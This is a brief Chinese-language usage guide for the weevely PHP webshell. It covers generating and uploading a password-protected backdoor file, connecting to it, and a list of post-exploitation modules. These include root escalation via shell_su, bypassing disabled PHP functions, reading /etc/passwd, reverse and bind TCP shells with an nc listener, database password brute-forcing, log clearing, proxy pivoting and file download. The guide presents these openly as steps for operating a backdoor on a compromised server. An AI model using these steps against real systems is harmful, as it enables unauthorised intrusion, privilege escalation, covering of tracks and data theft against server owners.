weevely基本用法
1.使用generate生成后門a.php,123456對應上圖的password即連接后門用的密碼
2.后門上傳后,使用weevely <URL> <password>連接
3.使用模塊,記得在模塊前加“:”
:shell_su 通過更變使用者來執行shell命令,可以獲得root權限來執行命令.
:shell_sh 執行 shell 命令.
:shell_php 執行 PHP 命令.
:system_extensions 收集PHP和webserver擴展列表
:system_info 收集系統信息
:system_procs 列出正在運行的進程
:audit_disablefunctionbypass 使用mod_cgi和.htaccess繞過系統禁用函數的限制。它會上傳.htaccess和CGI腳本,並在遠程服務器上運行偽系統shell
:audit_etcpasswd 查看/etc/passwd文件
:audit_suidsgid 查找帶有SUID或SGID標志的文件。
:audit_phpconf 查看php配置信息
:audit_filesystem 審核文件系統的弱權限。枚舉各種系統目錄並尋找可讀寫執行的目錄,模塊僅默認搜索部分linux下的常見目錄,logs、root、home等
:backdoor_reversetcp 執行反向TCP shell. 需要nc -lvp <port>監聽
:backdoor_tcp 在TCP端口上生成shell
:net_scan TCP端口掃描.
:net_mail 發送郵件.
:net_ifconfig 獲取網絡接口地址.
:net_curl 執行類似curl的HTTP請求.
:net_proxy 運行本地代理以通過目標轉移HTTP / HTTPS瀏覽
:net_phpproxy 在目標上安裝PHP代理.
:bruteforce_sql 可用來猜解數據庫密碼.
:file_find 查找具有給定名稱和屬性的文件.
:file_download 從遠程文件系統下載文件.
:file_check 獲取文件的屬性和權限.
:file_touch 更改文件時間戳.
:file_cd 更改當前工作目錄.
:file_grep 打印與多個文件中的模式匹配的行.
:file_gzip 壓縮或解壓gzip文件.
:file_tar 壓縮或解壓tar文件.
:file_enum 檢查路徑列表的存在和權限
:file_bzip2 壓縮或解壓bzip2文件.
:file_mount 使用HTTPfs掛載遠程文件系統.
:file_clearlog 從文件中刪除字符串.
:file_zip 壓縮或解壓zip文件.
:file_cp 復制單個文件.
:file_upload2web 自動將文件上傳到Web文件夾並獲取相應的URL.
:file_edit 在本地編輯器上編輯遠程文件.
:file_read 從遠程文件系統中讀取遠程文件.
:file_webdownload 指定URL下載文件.
:file_upload 文件上載到遠程文件系統.
:file_ls 列出目錄內容.
:file_rm 刪除遠程文件.
:sql_dump Multi dbms mysqldump replacement.
:sql_console 執行SQL查詢或運行sql控制台.